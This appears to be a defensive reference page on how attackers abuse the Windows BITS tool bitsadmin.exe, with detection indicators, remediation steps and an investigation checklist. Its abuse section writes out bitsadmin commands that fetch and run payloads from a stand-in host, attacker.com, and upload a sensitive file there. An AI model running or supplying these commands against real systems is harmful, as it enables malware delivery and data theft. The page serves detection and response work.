B
Critical RiskWindowsLegitimateCommonly Abused
bitsadmin.exeSYSTEM UTILITY

bitsadmin.exe - BITS Admin LOLBin Security Analysis

bitsadmin.exe is the Background Intelligent Transfer Service command-line tool and a notorious LOLBin. Attackers abuse it for stealthy file downloads that persist across reboots, execution of downloaded payloads, and data exfiltration. BITS jobs are difficult to detect and survive system restarts.

3viewsLast verified: Jan 18, 2026

Risk Summary

CRITICAL priority for SOC triage. bitsadmin.exe is a top-tier LOLBin for persistent downloads and execution. Any /transfer, /create, or /addfile commands require **immediate investigation**. BITS jobs persist across reboots making this particularly dangerous.

Overview

What is bitsadmin.exe?

bitsadmin.exe manages Windows Background Intelligent Transfer Service (BITS) jobs.

Legitimate Functions

BITS Management:

  • Download Windows updates
  • Transfer large files
  • Resume interrupted downloads
  • Background throttled transfers

Why It's Dangerous

LOLBin Capabilities:

  • Stealthy file downloads
  • Persistence across reboots
  • Execute downloaded files
  • Difficult to detect

Security Significance

  • Trusted Binary: Signed Microsoft tool
  • Persistence: Jobs survive restarts
  • Evasion: Traffic appears as BITS
  • Execution: Can run downloaded files

Normal Behavior

Normal Behavior

Expected Process State

PropertyExpected Value
PathC:\Windows\System32\bitsadmin.exe
Parentcmd.exe, powershell.exe (admin)
UserAdministrator
ContextWindows Update operations

Legitimate Usage

:: Check BITS jobs (legitimate)
bitsadmin /list /allusers

:: Windows Update context only

Frequency

Direct bitsadmin usage is rare - Windows typically uses PowerShell or API.

Common Locations

C:\Windows\System32\bitsadmin.exeC:\Windows\SysWOW64\bitsadmin.exe

Suspicious Indicators

Legitimate vs Suspicious

LEGITIMATE (Very Rare)

Command:     bitsadmin /list
             bitsadmin /info
Context:     System administration
Frequency:   Rare

SUSPICIOUS (High Confidence)

Command:     bitsadmin /transfer /download http://...
             bitsadmin /create /addfile /resume
             bitsadmin /SetNotifyCmdLine
Context:     Any non-IT user
Frequency:   Any

Dangerous Parameters

ParameterRiskDescription
/transferCRITICALDownload file
/addfileCRITICALAdd file to job
/SetNotifyCmdLineCRITICALExecute on completion
/resumeHIGHStart download
/createHIGHCreate new job

Abuse Techniques

Attack Techniques

Technique #1: File Download (T1197)

Download Malware via BITS:

bitsadmin /transfer job /download /priority high http://attacker.com/mal.exe C:\mal.exe

Persistent Download Job:

bitsadmin /create downloadjob
bitsadmin /addfile downloadjob http://attacker.com/payload.exe C:\payload.exe
bitsadmin /resume downloadjob
bitsadmin /complete downloadjob

Technique #2: Execute After Download (T1059)

bitsadmin /SetNotifyCmdLine job C:\payload.exe
bitsadmin /resume job

Technique #3: Persistence (T1197)

BITS jobs persist across reboots - malware can create job that downloads and executes on every startup.

Technique #4: Data Exfiltration (T1048)

bitsadmin /transfer exfil /upload http://attacker.com/upload C:\sensitive.zip

Remediation Steps

Protection and Remediation

Defense: Monitor BITS Jobs

# Scheduled task to audit BITS
Get-BitsTransfer -AllUsers | Export-Csv "bits_audit.csv"

Defense: Application Control

Restrict bitsadmin.exe to administrators.

If Compromise Suspected

  1. List all BITS jobs
  2. Cancel suspicious jobs
  3. Identify downloaded files
  4. Trace execution chain
  5. Remove persistence
bitsadmin /cancel <job>
bitsadmin /reset /allusers

Investigation Checklist

Investigation Checklist

  • List all BITS jobs with /list /allusers
  • Review job URLs and destinations
  • Check for /SetNotifyCmdLine
  • Identify downloaded files
  • Check if downloads executed
  • Review command line history
  • Cancel malicious jobs
  • Hunt for persistence

MITRE ATT&CK Techniques